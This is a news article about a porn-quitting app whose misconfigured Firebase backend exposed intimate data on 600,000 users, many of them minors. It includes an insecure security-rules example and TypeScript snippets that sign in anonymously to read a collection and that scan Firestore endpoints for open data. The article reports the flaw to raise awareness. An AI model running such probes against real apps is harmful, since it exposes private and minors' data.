There’s something quietly disturbing about discovering that a tool meant to help people wrestle with their most private habits accidentally left the blinds wide open. An app that claims to help users stop consuming pornography ended up exposing intensely sensitive personal data, the kind of stuff most people wouldn’t even admit to a close friend. Ages. Masturbation frequency. Emotional triggers. How porn makes them feel afterward. And tucked inside that data were the records of a lot of minors, which makes your stomach drop a little when you really sit with it.
One user profile, for instance, listed their age as “14.” Their “frequency” showed porn use “several times a week,” sometimes up to three times a day. Their “triggers” were logged as “boredom” and “Sexual Urges.” The app had even assigned a “dependence score” and listed their “symptoms” as “Feeling unmotivated, lack of ambition to pursue goals, difficulty concentrating, poor memory or ‘brain fog.’” It reads less like analytics and more like a vulnerable diary entry — something that was supposed to stay locked away.
The app isn’t being named because the developer still hasn’t fixed the issue. The problem was uncovered by an independent security researcher who asked to remain anonymous. He first flagged it to the app’s creator back in September. The creator said he’d fix it quickly. That didn’t happen. The flaw comes from a misconfiguration in how the app uses Google Firebase, a popular mobile app development platform. Firebase projects often enable anonymous sign-in, which lets anyone on the internet become an “authenticated” user with a single API call; if the security rules only check for authentication, that stranger can then read the backend storage, the digital attic where all the private boxes tend to live if you’re not careful.
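The app’s actual rules aren’t public, but the pattern researchers keep finding looks something like this hypothetical Firestore security-rules snippet:

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Looks safe at a glance: only "authenticated" users get in. But if
    // anonymous sign-in is enabled, anyone on the internet can become
    // authenticated with a single API call.
    match /{document=**} {
      allow read, write: if request.auth != null;
    }
  }
}
```

The check reads like a lock. With anonymous sign-in enabled, it’s a lock that hands a key to anyone who asks.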
Overall, the researcher said he could access information belonging to more than 600,000 users of the porn-quitting app, with roughly 100,000 identifying as minors. That number lands heavy. It’s not abstract. It’s classrooms. It’s school buses. It’s kids who probably assumed they were talking into a void, not a wide-open window.
The app also invites users to write confessions about their habits. One of them read: “I just can’t do this man I honestly don’t know what to do know more, such a loser, I need serious help.” You can almost hear the frustration in that sentence — the messy spelling, the emotional spill. That’s not data. That’s a human having a rough night.
When reached by phone, the creator of the app said he had spoken with the researcher but denied that the app had ever exposed any user data through a misconfigured Google Firebase backend. He suggested the researcher may have fabricated the data that was reviewed.
“There is no sensitive information exposed, that’s just not true,” the founder said. “These users are not in my database, so, like, I just don’t give this guy attention. I just think it’s a bit of a joke.”
When asked why he previously thanked the researcher for responsibly disclosing the misconfiguration and said he would rush to fix it, he wished me a good day and hung up. One of those conversations that ends abruptly, leaving a strange quiet buzzing in the room.
After the call, an account was created on the app. The researcher was then able to see that new account appear inside the misconfigured Google Firebase environment — confirmation that user information was still exposed and accessible. Sometimes reality has a way of answering arguments faster than any debate ever could.
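That kind of check is simple to run. Here’s a hedged sketch of what it can look like using Firebase’s own web SDK; the API key, project ID, and “users” collection name below are hypothetical stand-ins, not the app’s real values:

```ts
import { initializeApp } from "firebase/app";
import { getAuth, signInAnonymously } from "firebase/auth";
import { collection, getDocs, getFirestore, limit, query } from "firebase/firestore";

// A Firebase client config is not a secret: it ships inside every app
// binary and can be pulled out of an APK or IPA in minutes.
const app = initializeApp({
  apiKey: "AIza-EXAMPLE",        // hypothetical
  projectId: "example-project",  // hypothetical
});

async function main(): Promise<void> {
  // One call, no email or password, and the caller is "authenticated."
  await signInAnonymously(getAuth(app));

  // If the rules only check `request.auth != null`, this read now
  // succeeds for any stranger who ran the line above.
  const snapshot = await getDocs(
    query(collection(getFirestore(app), "users"), limit(5)),
  );
  snapshot.forEach((doc) => console.log(doc.id, doc.data()));
}

main().catch(console.error);
```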
This type of Google Firebase misconfiguration isn’t new. Security researchers have been documenting it for years, and it continues to surface today. It’s one of those problems that feels boring until it suddenly isn’t, until someone’s real-life data is sitting out in the open.
Dan Guido, CEO of cybersecurity research and consulting firm Trail of Bits, said in an email that this Firebase issue is “a well known weakness” and easy to find. He recently noted on X that Trail of Bits was able to build a tool using Claude to scan for this vulnerability in just 30 minutes.
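That 30-minute figure is plausible because the core of such a scanner is small. The sketch below is not Trail of Bits’ tool, just the general technique: assuming you already have candidate project IDs and collection names (all hypothetical here), it probes Firestore’s public REST endpoint and reads the status codes.

```ts
// An unauthenticated 200 from this endpoint means the rules let the whole
// internet read the collection; 403 means they held. (Rules that merely
// require sign-in also return 403 here; a fuller scanner would retry
// with an anonymous-auth token, as in the earlier sketch.)
const CANDIDATE_COLLECTIONS = ["users", "profiles", "confessions"]; // guesses

async function probe(projectId: string): Promise<void> {
  for (const name of CANDIDATE_COLLECTIONS) {
    const url =
      `https://firestore.googleapis.com/v1/projects/${projectId}` +
      `/databases/(default)/documents/${name}?pageSize=1`;
    const res = await fetch(url); // no credentials attached
    const label = res.ok ? "[OPEN]  " : "[locked]";
    console.log(`${label} ${projectId}/${name} (HTTP ${res.status})`);
  }
}

probe("example-project").catch(console.error);
```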
“If anyone is best positioned to implement guardrails at scale, it is Google/Firebase themselves. They can detect ‘open rules’ in a user’s account and warn loudly, block production configs, or require explicit acknowledgement,” he said. “Amazon has done this successfully for S3.” S3 is Amazon Web Services’ cloud storage product; publicly exposed buckets were a recurring source of breaches for years until Amazon added loud console warnings and began blocking public access by default.
The researcher who uncovered the app’s vulnerability added that this insecure setup is often the default in Google Firebase. He also pointed a finger at Apple, arguing that apps should be reviewed for backend security issues before being allowed into the App Store.
“Apple will literally decline an app from the App Store if a button is two pixels too wide against their design guidelines, but they don’t check anything to do with the back-end database security you can find online,” he said. It’s one of those comments that lands with an uncomfortable kind of truth: polished surfaces, shaky foundations.
Apple and Google did not respond to requests for comment.
And that’s the part that lingers. People trusted this app with their most awkward truths, their late-night regrets, their quiet attempts at self-control. Some of them were kids. They weren’t posting for an audience. They were whispering into what they thought was a locked room. Turns out the door was never really closed.